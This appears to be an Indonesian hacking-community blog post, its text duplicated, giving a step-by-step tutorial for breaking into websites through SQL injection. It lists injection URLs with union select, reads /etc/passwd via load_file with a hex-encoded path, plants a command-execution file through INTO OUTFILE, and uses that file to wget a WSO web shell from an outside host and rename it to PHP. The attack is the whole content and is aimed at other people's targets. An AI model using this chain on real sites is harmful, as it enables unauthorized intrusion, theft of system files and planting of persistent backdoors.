SQL INJECTION INTO OUT FILE (UPLOAD SHELL WITHOUT ADMIN ACCES)
SQL Injection Into Out File (Upload Shell Vulneralibity) - Halooo... apa kabar saudara saudara ku hehehehehe
Aku mau post sebuah teknik dimana baru saja aku pelajari tadi ya jadi nya begini belum ahli cuma karena keantusiasan saya mau berbagi dengan teman teman jadi saya post lah disini kita belajar bareng bareng oke Big Grin
Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada sebuah web jika kita menggunakan teknik SQLi kecuali jika kita menggunakan teknik kayak XSS, LFI/RFI atau exploit uploadify kaya wp-store atau csrf dimana kita bisa mengupload shell atau backdor kita tanpa hak akses root didalam panel admin. Nah bagaimana jika sqli yg notabene kita dipaksa harus hash password dan find admin page wkwkwkwk merepotkan juga ya Big Grin
*skip skip kmon lets go to tkp :v
[!] Persiapan
1. Koneksi internet
2. Target vuln SQLi
3. kopi
-Step One
Kalau ketemu target tambahin symbol ' biar tau vuln atau kagak
Kalau vuln langsung kita injek seperti biasa
1. Cari jumlah kolom dengan order by
2. Cari angka cantik dengn union select
Nah gambar dibawah ini kan kelihat angka cantik pada web yg aku injek
[Image: Screenshot_2014_12_22_10_41_04.jpg]
-Step Two
Kita coba lihat /etc/passwd dengan cara menambahkan
load_file(/etc/passwd) pada di angka 4
loh kok hasilnya gak keluar /etc/passwd malah error
Woles woles mari kita bypass
convert /etc/passwd ke hexadecimal
Hasilnya 2f6574632f706173737764 maka kita tambahkan 0x di depanya
0x2f6574632f706173737764
Nanti ada gambar kayak dibawah ini
Kok cuman user root doang yang muncul..
tenang 😁 coba ctrl + u / view- source
Step 3 :
Lanjut ke tahap upload shell
pertama kita tanam cmd.php yang berfungsi untuk mengeksekusi command
into outfile "/home/webcouncil/public_html/cmd.php" : ini perintah untuk menanam script tadi dengan nama file cmd.php di direktori public_html
loh kok bisa tau kalau pathnya /home/localhost/public_html/
ingat error di web tadi?
Nah dari situ saya tau pathnya
trus load url tadi dan hasilnya malah error :
Tenang saja Smile cuma error tapi masih bisa kok
kita coba cek localhost/cmd.php
Tara ^_^ hasilnya nanti memang blank tapi bukan 404 not found lo yaa
lalu kita coba eksekusi command untuk upload shell
Kita pakai wget untuk upload shell.. tapi shell harus berformat txt
Dan Skarang rename wso.txt menjadi wso.php
Terakhir sudah ada kan shell nya?
"Kak Malaikat, Kok Aku Gak Bisa?" Aku juga gam bisa kakak Big Grin tapi aku pelajari aja terus kadang bisa kadang enggakBig Grin
Hehehehe... demikian thread dari saya, mohon maaf kalau misal repost atau gak keren
Buat yg kawan nimbrung dimari yuk kasih ilmu nya juga
Special Thanks To: X Inject, Rebels, And All Member IBT
Aku mau post sebuah teknik dimana baru saja aku pelajari tadi ya jadi nya begini belum ahli cuma karena keantusiasan saya mau berbagi dengan teman teman jadi saya post lah disini kita belajar bareng bareng oke Big Grin
Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada sebuah web jika kita menggunakan teknik SQLi kecuali jika kita menggunakan teknik kayak XSS, LFI/RFI atau exploit uploadify kaya wp-store atau csrf dimana kita bisa mengupload shell atau backdor kita tanpa hak akses root didalam panel admin. Nah bagaimana jika sqli yg notabene kita dipaksa harus hash password dan find admin page wkwkwkwk merepotkan juga ya Big Grin
*skip skip kmon lets go to tkp :v
[!] Persiapan
1. Koneksi internet
2. Target vuln SQLi
3. kopi
-Step One
Kalau ketemu target tambahin symbol ' biar tau vuln atau kagak
Kalau vuln langsung kita injek seperti biasa
1. Cari jumlah kolom dengan order by
2. Cari angka cantik dengn union select
Nah gambar dibawah ini kan kelihat angka cantik pada web yg aku injek
[Image: Screenshot_2014_12_22_10_41_04.jpg]
-Step Two
Kita coba lihat /etc/passwd dengan cara menambahkan
load_file(/etc/passwd) pada di angka 4
Localhost/archive.php?id=-1 union select 1,2,3,load_file(/etc/passwd),5--+
loh kok hasilnya gak keluar /etc/passwd malah error
Woles woles mari kita bypass
convert /etc/passwd ke hexadecimal
Hasilnya 2f6574632f706173737764 maka kita tambahkan 0x di depanya
0x2f6574632f706173737764
Localhost/archive.php?id=-1 union select 1,2,3,load_file(0x2f6574632f706173737764),5--+
Nanti ada gambar kayak dibawah ini
Kok cuman user root doang yang muncul..
tenang 😁 coba ctrl + u / view- source
Step 3 :
Lanjut ke tahap upload shell
pertama kita tanam cmd.php yang berfungsi untuk mengeksekusi command
Localhost/archive.php?id=-1 uniOn SelEcT 1,'',3,4 into outfile "/home/webcouncil/public_html/cmd.php"--+
into outfile "/home/webcouncil/public_html/cmd.php" : ini perintah untuk menanam script tadi dengan nama file cmd.php di direktori public_html
loh kok bisa tau kalau pathnya /home/localhost/public_html/
ingat error di web tadi?
"Warning: mysql_num_rows() expects parameter 3 to be resource, boolean given in /home/webcouncil/public_html/archive.php on line 12 "
Nah dari situ saya tau pathnya
trus load url tadi dan hasilnya malah error :
Cannot execute a blank command in /home/localhost/cmd.php on line 1
Tenang saja Smile cuma error tapi masih bisa kok
kita coba cek localhost/cmd.php
Tara ^_^ hasilnya nanti memang blank tapi bukan 404 not found lo yaa
lalu kita coba eksekusi command untuk upload shell
localhost/cmd.php?cmd=[command]
Kita pakai wget untuk upload shell.. tapi shell harus berformat txt
localhost/cmd.php?cmd=wget http://files.xakep.biz/shells/PHP/wso.txt
Dan Skarang rename wso.txt menjadi wso.php
localhost/cmd.php?cmd=mv wso.txt wso.php
Terakhir sudah ada kan shell nya?
"Kak Malaikat, Kok Aku Gak Bisa?" Aku juga gam bisa kakak Big Grin tapi aku pelajari aja terus kadang bisa kadang enggakBig Grin
Hehehehe... demikian thread dari saya, mohon maaf kalau misal repost atau gak keren
Buat yg kawan nimbrung dimari yuk kasih ilmu nya juga
Special Thanks To: X Inject, Rebels, And All Member IBT
0 Response to "SQL INJECTION INTO OUT FILE (UPLOAD SHELL WITHOUT ADMIN ACCES)"
Post a Comment